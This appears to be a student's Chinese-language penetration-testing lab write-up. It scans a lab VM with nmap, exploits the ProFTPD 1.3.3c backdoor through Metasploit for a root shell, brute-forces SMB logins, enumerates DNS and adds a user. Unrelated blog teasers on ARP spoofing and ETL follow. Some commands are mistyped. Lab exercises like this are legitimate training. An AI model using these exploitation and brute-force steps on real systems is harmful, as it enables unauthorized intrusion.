前期準備:開啟虛擬機器,開啟完畢後會顯示伺服器的ip
1、 收集此伺服器的資訊。
1) 開放的埠及服務
nmap 192.168.100.100
通過命令檢視目標ip開放的埠和服務,從而獲得埠資訊和開放的服務資訊
2) 此伺服器主機名
nmap -sv 192.168.100.100
-sv 探測埠服務版本並且可以檢視該伺服器的主機名
3. 使用metasploit對此伺服器某服務後門漏洞進行利用,並獲得最高許可權
1)該存在後門漏洞的服務為proftpd後門漏洞
nmap -st -pn -a 192.168.100.100
seach proftpd
2) 漏洞利用與獲得最高許可權過程
通過對各個服務進行查詢後門漏洞,最終發現proftpd_133c_backdoor的後門漏洞並進行利用攻擊
set payload cmd/unix/bind_perl
選擇攻擊漏洞利用模組
set rhost 192.168.100.100
作為目標靶機的ip位址
set lport 21
為目標埠
show options
檢視列出滲透攻擊模組或模組的所有配置引數
exploit
進行滲透攻擊
然後遇到500 invalid command的報錯,這時需要進行提權
help acid*****ez
輸入之後,成功滲透進入靶機 shell輸入後可以進入命令列,接著輸入sudo -s切換到root使用者介面,獲得最高許可權成功。4:對此伺服器某存在弱口令的服務進行密碼爆破
1) 該存在弱口令的服務為smb
驗證存在弱口令的服務為smb,接著進行登入爆破
use auxiliary/scanner/smb/smb_login
2)口令爆破過程
現在進行下一步的操作爆破
set rhosts 192.168.100.100
進行設定目標ip靶機
set user_file /root/dic.txt
設定使用者名稱的txt文字錄入
set pass_file /root/dic.txt
設定使用者密碼的txt文字錄入
最後進行爆破run
,等待爆破結果發現
success ——user:admin3)使用獲得的密碼登入該服務,並找出key檔案就是成功爆破的使用者名稱與密碼
進入我的電腦,輸入靶機ip:\192.168.100.100進入登入,並輸入使用者名稱與密碼,檢視到三個檔案目錄的opt,最後找到key檔案存在。5. 此伺服器開放了dns伺服器提供class.sec網域名稱的解析,請進行資訊收集
1)查詢該網域名稱的ns和mx記錄
dig @192.168.100.100 class.sec mx
dig @192.168.100.100 class.sec ns
通過dig命令查詢網域名稱的ns和mx記錄,2) 使用工具對該網域名稱解析進行窮舉mx:郵件伺服器資源記錄,記錄乙個域的郵件伺服器的網域名稱
ns:名字伺服器資源記錄,記錄乙個域的權威網域名稱伺服器的網域名稱
fierce -dnsserver 192.168.100.100 -dns class.sec
fierce 工具主要是對子網域名稱進行掃瞄和收集資訊,使用fierce工具獲得乙個目標主機上所有ip位址和主機資訊6:使用上述漏洞利用得到的許可權建立乙個帳號,要求如下:
1) 以「學號+姓名首字母」命名
利用第三題的proftpd_133c_backdoor的後門漏洞再次進行滲透, 獲取最高許可權後的root進行漏洞利用
useradd 666nmz
使用者名稱的命名為學號後三位+姓名首字母
passwd 666nmz
選擇設定密碼的使用者,並設定密碼
輸出密碼後,再次輸出密碼進行確認2) uid為學號後3位
usermod -u 666 666nmz
這行命令就是設定uid為學號後三位的命令,在root使用者下進行設定後,su切換到666nmz使用者,輸入id命令檢視666nmz使用者下的uid為666(666nmz)7. 使用ssh登入該賬戶
1)登入成功後顯示的資訊
進行ssh服務登入,請求登入後會提示是否繼續登入(yes or no),確定登入後需要輸出密碼,密碼成功後完成。2) 檢視/etc/passwd檔案
在ssh登入後的root使用者下檢視/etc/passwd檔案
Kali 下的 ARP斷網實驗實現過程
位址解析協議是建立在網路中各個主機互相信任的基礎上的,網路上的主機可以自主傳送arp應答訊息,其他主機收到應答報文時 不會檢測該報文的真實性 就會將其記入本機arp快取 由此攻擊者就可以向某一主機傳送偽arp應答報文,使其傳送的資訊無法到達預期的主機或到達錯誤的主機,這就構成了乙個arp欺騙 ifc...
ETL方法與過程講解
1 etl基本概念和術語 1.1 etl extract transform load的縮寫,資料抽取 extract 轉換 transform 裝載 load 的過程。1.2 dw datawarehousing,根據bill.inmon的定義,資料倉儲是面向主題的 整合的 穩定的 隨時間變化的,...
kali滲透測試與教學筆記的實驗環境
主要參考metasploit魔鬼訓練營 配置需要注意的特別是 閘道器伺服器linux metasploitable有兩個網絡卡,乙個連線dmz區,乙個連線內網,配置如下 開啟 etc sysctl.conf,開啟其中的資料報 功能 找到net.ipv4.ip forward 1語句,把前面的 號去掉...